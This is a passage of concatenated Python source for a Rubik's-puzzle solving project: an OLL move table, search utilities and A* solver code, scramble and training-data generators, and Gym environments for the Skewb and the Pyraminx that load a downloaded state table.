        "BUULUUUFR": ["R'", "U2", "X'", "R", "R", "U'", "R'", "U", "X", "R'", "U2", "R"],
        "BURLUUFFR": ["F'", "L'", "U'", "L", "U", "L'", "U'", "L", "U", "F"],
        "LUBLUULFF": ["R'", "F", "R'", "F'", "R2", "U2", "X'", "U'", "R", "U", "R'", "X"],
        "BUBLUUFFF": ["R'", "F", "R", "F'", "U2", "R2", "Y", "R'", "F'", "R", "F'"],
        "BBUUURLUF": ["R", "U", "R'", "Y", "R'", "F", "R", "U'", "R'", "F'", "R"],
        "UBBUURFUR": ["L'", "B'", "L", "U'", "R'", "U", "R", "L'", "B", "L"],
        "LBBUURFUU": ["U2", "X", "L", "R2", "U'", "R", "U'", "R'", "U2", "R", "U'", "M"],
        "UBUUURLUR": ["X'", "U'", "R", "U'", "R2", "F", "X", "R", "U", "R'", "U'", "R", "B2"],
        "LBBLUULUF": ["L", "U'", "Y'", "R'", "U2", "R'", "U", "R", "U'", "R", "U2", "R", "Y", "U'", "L'"],
        "BBRLUUUUF": ["U2", "X", "R'", "L2", "U", "L'", "U", "L", "U2", "L'", "U", "M"],
        "UBULUULUR": ["Y2", "F", "U", "R", "U'", "X'", "U", "R'", "D'", "R", "U'", "R'", "X"],
        "BBRLUULUU": ["X'", "L'", "U2", "R", "U", "R'", "U", "X", "L"],
        "UURLURUUR": ["R", "U", "X'", "R", "U'", "R'", "U", "X", "U'", "R'"],
        "LBRUUUUFU": ["R", "U", "R'", "U'", "X", "D'", "R'", "U", "R", "E'", "Z'"],
        "LBBUUUFFU": ["R'", "F", "R", "U", "R'", "F'", "R", "Y", "L", "U'", "L'"],
        "BBRUUUUFF": ["L", "F'", "L'", "U'", "L", "F", "L'", "Y'", "R'", "U", "R"],
        "BBRUUULFU": ["L'", "B'", "L", "R'", "U'", "R", "U", "L'", "B", "L"],
        "LBBUUUUFR": ["R", "B", "R'", "L", "U", "L'", "U'", "R", "B'", "R'"],
        "UURUURUFR": ["F", "U", "R", "U'", "R'", "F'"],
        "BUULUUFFU": ["R'", "Y", "U'", "L", "Y'", "U", "R", "U'", "R'", "F'", "R"],
        "UUBUURUFF": ["L", "Y'", "U", "R'", "Y", "U'", "L'", "U", "L", "F", "L'"],
        "LUULUULFU": ["F'", "U'", "L'", "U", "L", "F"],
        "LBUUUULFU": ["F", "R", "U", "R'", "U'", "F'"],
        "BBUUUUFFU": ["R", "U", "R'", "U'", "R'", "F", "R", "F'"],
        "LBULUUUUF": ["L", "U", "L'", "U", "L", "U'", "L'", "U'", "Y2", "R'", "F", "R", "F'"],
        "UBRUURFUU": ["R'", "U'", "R", "U'", "R'", "U", "R", "U", "Y", "F", "R'", "F'", "R"],
        "UBBUUULFU": ["R'", "F", "R", "U", "R'", "U'", "Y", "L'", "Y'", "U", "R"],
        "BBUUUUUFR": ["L", "F'", "L'", "U'", "L", "U", "Y'", "R", "Y", "U'", "L'"]
    }

    @staticmethod
    def get_orientations(cube, color = 'Y'):
        """Return the 9-char facing string for `color` over the whole top layer.

        Reads the top-layer cubies in fixed order (back row, middle row,
        front row), so the result matches the STEPS key encoding.
        """
        return ''.join([
            cube.cubies['BLU'].color_facing(color),
            cube.cubies['BU'].color_facing(color),
            cube.cubies['BRU'].color_facing(color),
            cube.cubies['LU'].color_facing(color),
            cube.cubies['U'].color_facing(color),
            cube.cubies['RU'].color_facing(color),
            cube.cubies['FLU'].color_facing(color),
            cube.cubies['FU'].color_facing(color),
            cube.cubies['FRU'].color_facing(color)
        ])

    def move(self, s, solution):
        """Apply the single move `s` to the cube and record it in `solution`."""
        self.cube.move(Move(s))
        solution.append(s)

    def solution(self):
        """Orient the last layer; returns the list of moves applied.

        Tries up to four "Y" rotations so the current pattern can be matched
        against the table in any of its four symmetric positions.
        """
        solution = []
        for _ in range(4):
            orientation = OLLSolver.get_orientations(self.cube)
            if orientation in OLLSolver.STEPS:
                step_solution = OLLSolver.STEPS[orientation]
                for s in step_solution:
                    self.move(s, solution)
                break
            # Pattern not found in this rotation; turn the whole cube and retry.
            self.move("Y", solution)
        return solution
import heapq
from collections import deque
"""
Data structures useful for implementing SearchAgents
"""
class Stack:
    """A container with a last-in-first-out (LIFO) queuing policy."""

    def __init__(self):
        self.list = []

    def push(self, item):
        """Place `item` on top of the stack."""
        self.list.append(item)

    def pop(self):
        """Remove and return the most recently pushed item."""
        return self.list.pop()

    def is_empty(self):
        """Return True when the stack holds no items."""
        return not self.list
class Queue:
    """A container with a first-in-first-out (FIFO) queuing policy.

    Backed by a collections.deque so both push and pop run in O(1); the
    previous list-based version paid O(n) for every ``insert(0, item)``.
    """

    def __init__(self):
        # Newest items live at the left end, oldest at the right end,
        # mirroring the layout of the original list implementation.
        self.list = deque()

    def push(self, item):
        """Enqueue the 'item' into the queue."""
        self.list.appendleft(item)

    def pop(self):
        """
        Dequeue the earliest enqueued item still in the queue. This
        operation removes the item from the queue.
        """
        return self.list.pop()

    def is_empty(self):
        """Returns true if the queue is empty"""
        return len(self.list) == 0
class PriorityQueue:
    """
    Implements a priority queue data structure. Each inserted item
    has a priority associated with it and the client is usually interested
    in quick retrieval of the lowest-priority item in the queue. This
    data structure allows O(1) access to the lowest-priority item.

    Note that this PriorityQueue does not allow you to change the priority
    of an item. However, you may insert the same item multiple times with
    different priorities.
    """

    def __init__(self):
        self.heap = []
        # Monotonic counter used as a tie-breaker so heap entries never
        # compare the stored items themselves; items need not be orderable
        # and equal priorities pop in FIFO order. (The previous version used
        # a bare `except:` to monkey-patch `__lt__` onto the item's class,
        # mutating callers' classes and failing on builtins such as dict.)
        self.count = 0

    def push(self, item, priority):
        """Insert `item` with the given `priority` (lower pops first)."""
        heapq.heappush(self.heap, (priority, self.count, item))
        self.count += 1

    def pop(self):
        """Remove and return the item with the lowest priority."""
        (_, _, item) = heapq.heappop(self.heap)
        return item

    def is_empty(self):
        """Return True when no items remain."""
        return len(self.heap) == 0
class PriorityQueueWithFunction(PriorityQueue):
    """
    A priority queue exposing the same push/pop signature as Queue and
    Stack, intended as a drop-in replacement for them. The caller supplies
    a priority function that derives each item's priority.
    """

    def __init__(self, priority_function):
        """priority_function (item) -> priority"""
        self.priority_function = priority_function  # store the priority function
        super().__init__()  # super-class initializer

    def push(self, item):
        """Add `item`, deriving its priority via the stored function."""
        super().push(item, self.priority_function(item))
def manhattan_distance(xy1, xy2):
    """Return the Manhattan distance between points xy1 and xy2 in R^2."""
    dx = abs(xy1[0] - xy2[0])
    dy = abs(xy1[1] - xy2[1])
    return dx + dy
from rubikai.solver import util
class SearchProblem:
    """
    This class outlines the structure of a search problem, but doesn't implement
    any of the methods (in object-oriented terminology: an abstract class).

    You do not need to change anything in this class, ever.
    """
    # NOTE: the original body called util.raiseNotDefined(), which does not
    # exist in rubikai.solver.util and would raise AttributeError; raising
    # NotImplementedError is the standard contract for abstract methods.

    def get_start_state(self):
        """
        Returns the start state for the search problem
        """
        raise NotImplementedError

    def is_goal_state(self, state):
        """
        state: Search state

        Returns True if and only if the state is a valid goal state
        """
        raise NotImplementedError

    def get_successors(self, state):
        """
        state: Search state

        For a given state, this should return a list of triples,
        (successor, action, stepCost), where 'successor' is a
        successor to the current state, 'action' is the action
        required to get there, and 'stepCost' is the incremental
        cost of expanding to that successor
        """
        raise NotImplementedError

    def get_cost_of_actions(self, actions):
        """
        actions: A list of actions to take

        This method returns the total cost of a particular sequence of actions. The sequence must
        be composed of legal moves
        """
        raise NotImplementedError
class Node:
    """
    A simple node class which saves arbitrary data and a pointer to a parent.
    """

    def __init__(self, data, parent=None):
        """
        Initializes a new node
        :param data: data to save
        :param parent: node's parent (Node object)
        """
        self.data = data
        self.parent = parent

    def is_root(self):
        """
        :return: True if this node has no parent, False otherwise
        """
        # Direct boolean expression instead of `True if ... else False`.
        return self.parent is None

    def path_from_root(self):
        """
        :return: a list of nodes which corresponds to a path from the root
                 to this node
        """
        path = []
        current = self
        while current is not None:
            path.append(current)
            current = current.parent
        # the above path is reversed. return the correct order:
        return path[::-1]
class SearchNode(Node):
    """A node whose payload is the (state, action, cost) triplet."""

    def __init__(self, state, action, cost, parent=None):
        # The generic `data` slot is unused; the triplet lives in named fields.
        super().__init__(None, parent)
        self.cost = cost
        self.action = action
        self.state = state
def _cost_so_far(node):
    """Accumulated path cost (`g` in the class notation); cached on the node."""
    if node.is_root():
        base = 0
    else:
        # Parent must have been processed already so its cache is populated.
        base = node.parent.incremental_cost
    node.incremental_cost = base + node.cost
    return node.incremental_cost
def generic_search(problem, data_structure, **kwargs):
    """
    Implements a generic search algorithm. I.e. this algorithm
    can be used with different data structures as fringe.
    :param problem: The search problem instance
    :param data_structure: A data structure for the fringe (e.g. Stack)
    :param kwargs: Additional keyword arguments for the data structure init
    :return: A list of actions if a goal state is found, an empty list otherwise
    """
    fringe = data_structure(**kwargs)
    visited = set()
    start_state = problem.get_start_state()
    fringe.push(SearchNode(state=start_state, action=None, cost=0))
    visited.add(start_state)
    while not fringe.is_empty():
        node = fringe.pop()
        # Goal test happens on expansion (pop), which is what UCS/A* need.
        if problem.is_goal_state(node.state):
            # omit the root node (doesn't have any action)
            path_from_root = node.path_from_root()[1:]
            return [p.action for p in path_from_root]
        else:
            visited.add(node.state)
            # NOTE(review): states are only marked visited when expanded, so
            # the same state may be pushed onto the fringe multiple times
            # before its first expansion.
            for successor, action, cost in problem.get_successors(node.state):
                if successor not in visited:
                    fringe.push(SearchNode(successor, action,
                                           cost, parent=node))
    # This means that the fringe is empty and no goal state was reached
    return []
def depth_first_search(problem):
    """Expand the deepest fringe nodes first (LIFO fringe)."""
    return generic_search(problem, data_structure=util.Stack)
def breadth_first_search(problem):
    """Expand the shallowest fringe nodes first (FIFO fringe)."""
    return generic_search(problem, data_structure=util.Queue)
def uniform_cost_search(problem):
    """Expand the node with the least total path cost first (Dijkstra-style)."""
    return generic_search(problem,
                          util.PriorityQueueWithFunction,
                          priority_function=_cost_so_far)
def null_heuristic(*_):
    """Trivial admissible heuristic: estimates every state at cost 0."""
    return 0
def a_star_search(problem, heuristic=null_heuristic):
    """Expand the node minimising f(n) = g(n) + h(n) first."""
    def combined_priority(node):
        # Keep the original evaluation order: heuristic first, then g(n).
        return heuristic(node.state, problem) + _cost_so_far(node)
    return generic_search(problem,
                          util.PriorityQueueWithFunction,
                          priority_function=combined_priority)
# Abbreviations
# Short aliases so callers can use the conventional search names.
bfs = breadth_first_search
dfs = depth_first_search
a_star = a_star_search
ucs = uniform_cost_search
from rubikai.solver import search
from rubikai.cube.cube import Cube, Face, Action
import numpy as np
import pandas as pd
class CubeProblem(search.SearchProblem):
    """A Problem class to be used with the search module."""

    def __init__(self, cube, quarter_metric=True):
        """
        :param cube: a rubikai.cube.cube.Cube instance
        :param quarter_metric: if True, use 90 degrees rotations only.
                               otherwise use also 180 degrees.
        """
        self.cube = cube
        self.expanded = 0
        self.actions = []
        turn_amounts = (-1, 1) if quarter_metric else (-1, 1, 2)
        for layer in range(self.cube.layers // 2):
            for k in turn_amounts:
                for face in Face:
                    self.actions.append(Action(face, k, layer))

    def get_start_state(self):
        """The initial search state is a copy of the wrapped cube."""
        return self.cube.copy()

    def is_goal_state(self, cube):
        """A state is a goal exactly when the cube is solved."""
        return cube.is_solved()

    def get_successors(self, cube):
        """Return (successor, action, cost) triples for every legal action."""
        self.expanded += 1
        triples = []
        for action in self.actions:
            rotated = cube.copy().rotate(
                action.face, action.k, action.layer)
            triples.append((rotated, action, 1))
        return triples

    def get_cost_of_actions(self, actions):
        """Every action costs 1, so the total cost is the sequence length."""
        return len(actions)
def solve(cube, heuristic=lambda *args: 0, verbose=False):
    """
    solves a given cube instance
    :param cube: rubikai.cube.cube.Cube instance
    :param heuristic: a heuristic function for A* search; takes a cube and a
                      problem instance and returns a number (defaults to the
                      null heuristic, i.e. 0 for every state)
    :param verbose: if True, prints some information about the search
    :return: (actions, expansions): the solving move list and the number of
             nodes expanded while finding it
    """
    problem = CubeProblem(cube)
    actions = search.a_star(problem, heuristic)
    if verbose:
        print('Length %d solution found:\n%s' %
              (len(actions), ' '.join(str(a) for a in actions)))
        print('Expanded %d nodes.' % problem.expanded)
    return actions, problem.expanded
def random_actions(cube, num_actions, quarter_metric=True):
    """
    returns a sequence of random actions on the given cube
    (does not apply the actions to the cube)
    :param cube: Cube object
    :param num_actions: an integer >= 1
    :param quarter_metric: whether to use the quarter-turn metric or not
    :return: a sequence of `num_actions' actions
    """
    assert num_actions >= 1, "there's no sense in less than 1 steps"
    # CubeProblem is built only to enumerate the set of legal actions.
    cube_problem = CubeProblem(cube, quarter_metric)
    last_cube = cube.copy()
    # Cube states already produced by the walk; relies on Cube providing
    # value-based hashing/equality.
    visited = {last_cube.copy()}
    possible_actions = cube_problem.actions
    actions = [None] * num_actions
    actions[0] = np.random.choice(possible_actions)
    # NOTE(review): actions[0] is never applied to last_cube, so the
    # visited-check below ignores the first move — possibly unintended.
    for i in range(1, num_actions):
        rand_action = np.random.choice(possible_actions)
        # Re-sample until the candidate leads to an unseen cube state.
        # NOTE(review): assumes Cube.apply returns the mutated cube — confirm.
        while last_cube.copy().apply([rand_action]) in visited:
            rand_action = np.random.choice(possible_actions)
        actions[i] = rand_action
        last_cube.apply([rand_action])
        visited.add(last_cube.copy())
    return actions
def switchable(a_1, a_2):
    """
    decide if 2 actions can be swapped.
    two actions are independent if they are on opposite faces or on the same
    face but on different layers.
    :param a_1: first action
    :param a_2: second action
    :returns True if switchable, False otherwise
    """
    if a_1.face.value + a_2.face.value == 5:
        # opposite faces commute: swap only to order by descending face value
        return a_1.face.value > a_2.face.value
    if a_1.face.value == a_2.face.value and a_1.layer != a_2.layer:
        # same face on different layers commutes: order by descending layer
        return a_1.layer > a_2.layer
    return False
def bubble_sort(actions):
    """Bubble sort in place, swapping only independent (switchable) actions."""
    upper = len(actions) - 1
    swapped = True
    while upper > 0 and swapped:
        swapped = False
        for idx in range(upper):
            if switchable(actions[idx], actions[idx + 1]):
                actions[idx], actions[idx + 1] = actions[idx + 1], actions[idx]
                swapped = True
        upper -= 1
    return actions
def reduce_same_actions(actions):
    """ reduce a sequence of the same actions """
    # Collapses each run of consecutive actions on the same face and layer
    # into at most two equivalent quarter turns.
    reduced_actions = []
    i = 0
    while i < len(actions):
        curr_action_k = actions[i].k
        j = i + 1
        # Sum the turn amounts over the whole run [i, j) of same-face,
        # same-layer actions.
        while j < len(actions) and \
                actions[i].face.value == actions[j].face.value and \
                actions[i].layer == actions[j].layer:
            curr_action_k += actions[j].k
            j += 1
        # end while
        curr_action_k %= 4  # net quarter turns, full rotations cancel out
        if curr_action_k == 2:
            # A half turn is emitted as two -1 quarter turns (quarter metric).
            a = Action(actions[i].face, -1, actions[i].layer)
            reduced_actions.append(a)
            reduced_actions.append(a)
        elif curr_action_k != 0:
            a = Action(actions[i].face, curr_action_k, actions[i].layer)
            reduced_actions.append(a)
        # end if
        i = j
    # end while
    return reduced_actions
def reduce_sequence(actions):
    """
    two actions on the cube are independent if they don't affect the same faces,
    in this case we can change the order of the actions.
    we then can go over sequences of dependent action and change a series
    of action to shorter ones.
    """
    reordered = bubble_sort(actions)
    return reduce_same_actions(reordered)
def generate_random_sequence(cube_size, d):
    """Return a reduced random scramble of exactly `d` moves ([] when d == 0)."""
    if d == 0:
        return []
    while True:
        cube = Cube(cube_size)
        # Over-generate (2*d moves) so that after reduction at least d remain.
        candidate = reduce_sequence(random_actions(cube, 2 * d))
        if len(candidate) >= d:
            return candidate[:d]
def compare_heuristics(heuristics, cube_layers, d_values,
                       iterations, verbose=False):
    """
    uses the given heuristics to solve multiple instances of scrambled cubes
    and gathers information on the solutions.
    :param heuristics: a dictionary where the key is the heuristic name and the
                       value is the heuristic function handle
    :param cube_layers: number of cube layers the heuristic operates on
    :param d_values: an array-like of integers specifying the number of
                     scramble moves to check
    :param iterations: number of iterations for each num. of scramble moves
    :param verbose: if True, prints information as the test goes
    :returns: pandas DataFrame with all the data gathered
    """
    # print only if verbose is True
    def vprint(*a, **kw):
        if verbose:
            print(*a, **kw)
    # end vprint

    # column names
    name_col = 'heuristic_name'
    d_col = 'num_scrambles'
    opt_col = 'is_optimal'
    exp_col = 'expansions'
    # DataFrame.append was deprecated and removed in pandas 2.0, and
    # appending row-by-row copies the whole frame each time; collect plain
    # dicts and build the DataFrame once at the end instead.
    rows = []
    for i in range(iterations):
        vprint('Iteration:', i, '\n')
        for d in d_values:
            # generate a random sequence of length d and scramble the cube
            rand_seq = generate_random_sequence(cube_layers, d)
            vprint('Generated sequence:', rand_seq, '(length %d)' % d)
            c = Cube(cube_layers)
            c.apply(rand_seq)
            # test each heuristic on the scrambled cube
            for h_name in heuristics:
                h = heuristics[h_name]
                solution, expansions = solve(c, h, verbose)
                rows.append({
                    name_col: h_name,
                    d_col: d,
                    opt_col: len(solution) == d,
                    exp_col: expansions
                })
                vprint()
            # end for
        vprint()
    # end for
    vprint()
    return pd.DataFrame(rows, columns=[name_col, d_col, opt_col, exp_col])
import numpy as np
from rubikai.cube.cube import Cube
from rubikai.solver.solver import generate_random_sequence
def scrambled_cube_generator(layers, max_d, p=None):
    """
    a generator that performs a random walk _back_ from a solved cube, where
    the number of moves performed is at most `max_d' (inclusive).
    yields a pair of a scrambled_cube_array and the number of actual moves
    performed.
    :param layers: the number of layers in the scrambled cube
    :param max_d: the maximal depth of the random walk
    :param p: (optional) a length (max_d+1) probabilities vector according to
              which the number of scramble-steps is chosen.
    :return: (arr, d) pairs, where `arr' is a scrambled-cube array and d is
             the number of moves that were performed to scramble it.
    """
    depth_choices = np.arange(max_d + 1)
    while True:
        cube = Cube(layers)
        depth = np.random.choice(depth_choices, p=p)
        cube.apply(generate_random_sequence(layers, depth))
        yield cube.to_array(), depth
def batch_generator(layers, max_d, batch_size, p=None):
    """
    same as `scrambled_cube_generator', but for batches of data.
    :param layers: cube dimension (layers x layers x layers cube)
    :param max_d: maximal number of scramble-steps
    :param batch_size: number of instances for each iteration
    :param p: num-of-steps probabilities vector (see scrambled_cube_generator)
    :return: (data, labels) pair, where `data' is a 2d array in which each row
             is a scrambled cube array. labels is a 1d array where each entry
             corresponds to a row in the data array.
    """
    dimension = len(Cube(layers).to_array())
    # Use one long-lived source generator. The original re-created it for
    # every batch and, by breaking out of `enumerate` only when i reached
    # batch_size, scrambled one extra cube per batch that was then discarded.
    source = scrambled_cube_generator(layers, max_d, p)
    while True:
        # preallocate the output arrays
        data = np.empty((batch_size, dimension), dtype=np.int8)
        # NOTE(review): int8 labels assume max_d <= 127 — confirm.
        labels = np.empty(batch_size, dtype=np.int8)
        # generate exactly batch_size instances
        for i in range(batch_size):
            arr, d = next(source)
            data[i, :] = arr
            labels[i] = d
        yield data, labels
import pickle
import random
import gym
from gym import spaces
import os
import cv2
import numpy as np
import gc
import wget
class SkewbEnv(gym.Env):
    """OpenAI Gym environment for the Skewb puzzle.

    State is a flat array of 30 sticker ids (5 per face); observations are
    integer indices into a precomputed table of all 3,149,280 reachable
    states. The four actions are the clockwise face turns L, R, U, B.
    """

    metadata = {'render.modes': ['human', 'rgb_array', 'ansi']}

    def __init__(self):
        self.cube = None          # np.uint8 array of 30 sticker ids
        self.cube_reduced = None  # 30-char colour string, e.g. "WWWWWOOOOO..."
        self.cube_state = None    # integer index into self.cube_states
        # spaces
        self.action_space = spaces.Discrete(4)
        self.observation_space = spaces.Discrete(3149280)
        state_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "skewb_states.pickle")
        if not os.path.exists(state_file):
            print("State file not found")
            print("Downloading...")
            wget.download("https://storage.googleapis.com/rubiks_cube_gym/skewb_states.pickle", state_file)
            print("Download complete")
        with open(state_file, "rb") as f:
            # SECURITY: unpickling a downloaded file executes arbitrary code
            # if the remote content is tampered with; trusted source assumed.
            self.cube_states = pickle.load(f)

    def update_cube_reduced(self):
        """Refresh the colour-string view of the sticker array."""
        self.cube_reduced = ''.join(TILE_MAP[tile] for tile in self.cube)

    def update_cube_state(self):
        """Refresh the integer state id for the current colour string."""
        self.cube_state = self.cube_states[self.cube_reduced]

    def generate_scramble(self):
        """Return an 11-move scramble; never turns the same face twice in a row."""
        scramble_len = 0
        prev_move = None
        scramble = ""
        layer_moves = ['L', 'R', 'U', 'B']
        layer_move_types = ['', "'"]
        while scramble_len < 11:
            move = random.choice(layer_moves)
            while move == prev_move:
                move = random.choice(layer_moves)
            scramble += move + random.choice(layer_move_types) + " "
            prev_move = move
            scramble_len += 1
        return scramble[:-1]  # drop the trailing space

    def move(self, move, move_type=None):
        """Apply one face turn; move_type None = CW, "'" = CCW (two CW turns)."""
        repetitions = dict({None: 1, "'": 2})[move_type]
        # Sticker-cycle index tables per face; a move outside L/R/U/B would
        # raise UnboundLocalError below (no explicit validation).
        if move == "L":
            layer_cubies_old = np.array([10, 12, 14, 8, 7, 6, 26, 27, 28])
            vertex_cubies_old = np.array([13, 9, 25])
            side_cubies_old = np.array([3, 24, 18])
        elif move == "R":
            layer_cubies_old = np.array([16, 17, 18, 26, 27, 28, 24, 22, 20])
            vertex_cubies_old = np.array([19, 29, 23])
            side_cubies_old = np.array([1, 14, 8])
        elif move == "U":
            layer_cubies_old = np.array([3, 2, 1, 20, 22, 24, 8, 7, 6])
            vertex_cubies_old = np.array([0, 21, 5])
            side_cubies_old = np.array([16, 28, 10])
        elif move == "B":
            layer_cubies_old = np.array([21, 22, 23, 29, 27, 25, 9, 7, 5])
            vertex_cubies_old = np.array([24, 28, 8])
            side_cubies_old = np.array([0, 19, 13])
        # Rotate every cycle by the turn amount and write the stickers back.
        layer_cubies_new = np.roll(layer_cubies_old, -3 * repetitions)
        vertex_cubies_new = np.roll(vertex_cubies_old, -1 * repetitions)
        side_cubies_new = np.roll(side_cubies_old, -1 * repetitions)
        np.put(self.cube, layer_cubies_old, self.cube[layer_cubies_new])
        np.put(self.cube, vertex_cubies_old, self.cube[vertex_cubies_new])
        np.put(self.cube, side_cubies_old, self.cube[side_cubies_new])

    def algorithm(self, moves):
        """Apply a whitespace-separated sequence of moves (e.g. "L U' B")."""
        for move in moves.split(" "):
            if len(move) == 2:
                self.move(move[0], move[1])
            else:
                self.move(move[0])

    def step(self, action):
        """Gym step: apply the mapped turn and return (obs, reward, done, info)."""
        move = ACTION_MAP[action]
        self.move(move[0], move[1])
        self.update_cube_reduced()
        self.update_cube_state()
        reward, done = self.reward()
        observation = self.cube_state
        info = {"cube": self.cube, "cube_reduced": self.cube_reduced}
        return observation, reward, done, info

    def reward(self):
        """Return (+100, True) on the solved pattern, otherwise (-1, False)."""
        if self.cube_reduced == "WWWWWOOOOOGGGGGRRRRRBBBBBYYYYY":
            return 100, True
        else:
            return -1, False

    def reset(self, scramble=None):
        """Reset to solved, then scramble.

        scramble=None -> apply a random scramble; scramble=False -> stay
        solved; otherwise `scramble` is applied as a move string.
        """
        self.cube = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
                              25, 26, 27, 28, 29], dtype=np.uint8)
        if scramble:
            self.algorithm(scramble)
        elif scramble is False:  # was `== False` (PEP 8 E712); identity test is the intended check
            pass
        else:
            self.algorithm(self.generate_scramble())
        self.update_cube_reduced()
        self.update_cube_state()
        return self.cube_state

    def render(self, mode='human', render_time=100):
        """Render the colour string ('ansi'), an RGB array, or a cv2 window ('human')."""
        if mode == 'ansi':
            return self.cube_reduced
        else:
            # TODO: the original `np.zeros(...) * 255` evaluates to zeros; a
            # white canvas (np.full(..., 255, np.uint8)) was probably intended.
            # Kept black to preserve the existing rendered output.
            img = np.zeros((225, 300, 3), np.uint8)
            face_anchor_map = {0: (75, 0), 1: (0, 75), 2: (75, 75), 3: (150, 75), 4: (225, 75), 5: (75, 150)}
            triangle_map = {0: [(0, 0), (37, 0), (0, 37)], 1: [(38, 0), (75, 0), (75, 37)],
                            3: [(0, 38), (0, 75), (37, 75)], 4: [(38, 75), (75, 38), (75, 75)]}
            for face in range(6):
                w, h = face_anchor_map[face]
                # Face centre (tile 2) fills the square; the 4 corner stickers
                # are drawn on top as triangles.
                cv2.rectangle(img, (w, h), (w + 75, h + 75), COLOR_MAP[TILE_MAP[self.cube[5 * face + 2]]], -1)
                for tile in range(5):
                    if tile == 2:
                        continue
                    triangle_cnt = np.array([(w, h)] * 3) + triangle_map[tile]
                    cv2.drawContours(img, [triangle_cnt], 0, COLOR_MAP[TILE_MAP[self.cube[5 * face + tile]]], -1)
            if mode == 'rgb_array':
                return img
            elif mode == "human":
                img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
                cv2.imshow("Cube", img)
                cv2.waitKey(render_time)

    def close(self):
        """Free the large state table and any open cv2 windows."""
        del self.cube_states
        gc.collect()
        cv2.destroyAllWindows()
# Maps each of the 30 sticker ids to its face colour letter
# (5 consecutive ids per face: White, Orange, Green, Red, Blue, Yellow).
TILE_MAP = {
    0: 'W', 1: 'W', 2: 'W', 3: 'W', 4: 'W',
    5: 'O', 6: 'O', 7: 'O', 8: 'O', 9: 'O',
    10: 'G', 11: 'G', 12: 'G', 13: 'G', 14: 'G',
    15: 'R', 16: 'R', 17: 'R', 18: 'R', 19: 'R',
    20: 'B', 21: 'B', 22: 'B', 23: 'B', 24: 'B',
    25: 'Y', 26: 'Y', 27: 'Y', 28: 'Y', 29: 'Y'
}

# RGB tuple used when rendering each colour letter.
COLOR_MAP = {
    'W': (255, 255, 255),
    'O': (255, 165, 0),
    'G': (0, 128, 0),
    'R': (255, 0, 0),
    'B': (0, 0, 255),
    'Y': (255, 255, 0)
}

# Discrete action id -> (face, turn type); None means clockwise.
ACTION_MAP = {0: ("L", None), 1: ("R", None), 2: ("U", None), 3: ("B", None)}
import pickle
import random
import gym
from gym import spaces
import os
import cv2
import numpy as np
import gc
import wget
class PyraminxWoTipsEnv(gym.Env):
    """OpenAI Gym environment for the Pyraminx (tips ignored for the goal).

    State is a flat array of 36 sticker ids; observations are integer
    indices into a precomputed table of 993,120 states. The four actions
    are the clockwise layer turns L, R, U, B.
    """

    metadata = {'render.modes': ['human', 'rgb_array', 'ansi']}

    def __init__(self):
        self.cube = None          # np.uint8 array of 36 sticker ids
        self.cube_reduced = None  # 36-char colour string
        self.cube_state = None    # integer index into self.cube_states
        # spaces
        self.action_space = spaces.Discrete(4)
        self.observation_space = spaces.Discrete(993120)
        state_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pyraminx_wo_tips_states.pickle")
        if not os.path.exists(state_file):
            print("State file not found")
            print("Downloading...")
            wget.download("https://storage.googleapis.com/rubiks_cube_gym/pyraminx_wo_tips_states.pickle", state_file)
            print("Download complete")
        with open(state_file, "rb") as f:
            # SECURITY: unpickling a downloaded file executes arbitrary code
            # if the remote content is tampered with; trusted source assumed.
            self.cube_states = pickle.load(f)

    def update_cube_reduced(self):
        """Refresh the colour-string view of the sticker array."""
        self.cube_reduced = ''.join(TILE_MAP[tile] for tile in self.cube)

    def update_cube_state(self):
        """Refresh the integer state id for the current colour string."""
        self.cube_state = self.cube_states[self.cube_reduced]

    def generate_scramble(self):
        """Return an 11-move scramble; never turns the same layer twice in a row."""
        scramble_len = 0
        prev_move = None
        scramble = ""
        layer_moves = ['L', 'R', 'U', 'B']
        layer_move_types = ['', "'"]
        while scramble_len < 11:
            move = random.choice(layer_moves)
            while move == prev_move:
                move = random.choice(layer_moves)
            scramble += move + random.choice(layer_move_types) + " "
            prev_move = move
            scramble_len += 1
        return scramble[:-1]  # drop the trailing space

    def move(self, move, move_type=None):
        """Apply one turn; upper-case moves turn the layer plus its tip,
        lower-case moves turn only the tip trio. move_type None = CW, "'" = CCW."""
        repetitions = dict({None: 1, "'": 2})[move_type]
        if move.isupper():
            # Sticker cycle of the full layer for this face.
            if move == "L":
                layer_cubies_old = np.array([14, 22, 23, 11, 12, 13, 29, 28, 32])
            elif move == "R":
                layer_cubies_old = np.array([16, 24, 23, 29, 30, 34, 19, 18, 17])
            elif move == "U":
                layer_cubies_old = np.array([2, 3, 13, 14, 15, 16, 17, 7, 8])
            elif move == "B":
                layer_cubies_old = np.array([11, 1, 2, 8, 9, 19, 34, 33, 32])
            layer_cubies_new = np.roll(layer_cubies_old, -3 * repetitions)
            np.put(self.cube, layer_cubies_old, self.cube[layer_cubies_new])
            move = move.lower()
        # Tip (vertex) sticker trio for this corner; a move outside l/r/u/b
        # would raise UnboundLocalError below (no explicit validation).
        if move == "l":
            vertex_cubies_old = np.array([20, 27, 21])
        elif move == "r":
            vertex_cubies_old = np.array([25, 31, 26])
        elif move == "u":
            vertex_cubies_old = np.array([4, 5, 6])
        elif move == "b":
            vertex_cubies_old = np.array([0, 10, 35])
        vertex_cubies_new = np.roll(vertex_cubies_old, -1 * repetitions)
        np.put(self.cube, vertex_cubies_old, self.cube[vertex_cubies_new])

    def algorithm(self, moves):
        """Apply a whitespace-separated sequence of moves (e.g. "L U' B")."""
        for move in moves.split(" "):
            if len(move) == 2:
                self.move(move[0], move[1])
            else:
                self.move(move[0])

    def step(self, action):
        """Gym step: apply the mapped turn and return (obs, reward, done, info)."""
        move = ACTION_MAP[action]
        self.move(move[0], move[1])
        self.update_cube_reduced()
        self.update_cube_state()
        reward, done = self.reward()
        observation = self.cube_state
        info = {"cube": self.cube, "cube_reduced": self.cube_reduced}
        return observation, reward, done, info

    def reward(self):
        """Return (+100, True) on the solved pattern, otherwise (-1, False)."""
        if self.cube_reduced == "RRRRRGBBBBBRRRGGGBBBRGGGGGBYYYYYYYYY":
            return 100, True
        else:
            return -1, False

    def reset(self, scramble=None):
        """Reset to solved, then scramble.

        scramble=None -> apply a random scramble; scramble=False -> stay
        solved; otherwise `scramble` is applied as a move string.
        """
